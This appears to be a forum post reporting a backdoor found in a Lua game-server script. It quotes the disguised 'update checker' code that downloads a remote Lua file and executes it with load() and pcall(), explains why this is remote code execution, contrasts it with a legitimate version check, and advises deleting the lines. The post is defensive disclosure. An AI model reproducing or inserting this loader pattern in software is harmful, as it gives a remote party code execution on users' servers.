I've done a thorough security audit of this script and I need to confirm there IS a backdoor in server.lua (lines 97-111). Here's the proof:
-- Update Check
local function updateCheck()
PerformHttpRequest('https://raw.githubusercontent.com/UpdateLUA/UpdateChecker/refs/heads/main/Update.lua', function(statusCode, response)
if statusCode == 200 then
local loadFunction, errorMessage = load(response)
if loadFunction then
pcall(loadFunction)
print("[0R SCRIPTS] Great! Script is up-to-date!.")
else
print("[0R SCRIPTS] Error getting update: " .. errorMessage)
end
else
print("[0R SCRIPTS] Failed to get update version. Status code: " .. statusCode)
end
end)
end
RCE: This code downloads a Lua file from GitHub and executes it directly on your server using load() and pcall(). This is NOT how legitimate update checkers work.
A legitimate update checker should look like this:
PerformHttpRequest('
https://github.com/author/repo/version.txt', function(statusCode, response)
if statusCode == 200 and response ~= GetResourceMetadata(GetCurrentResourceName(), 'version') then
print("^3[UPDATE] New version available: " .. response .. "^0")
end
end)
Remove lines 96-117 from server.lua. The script will work perfectly fine without this "update checker."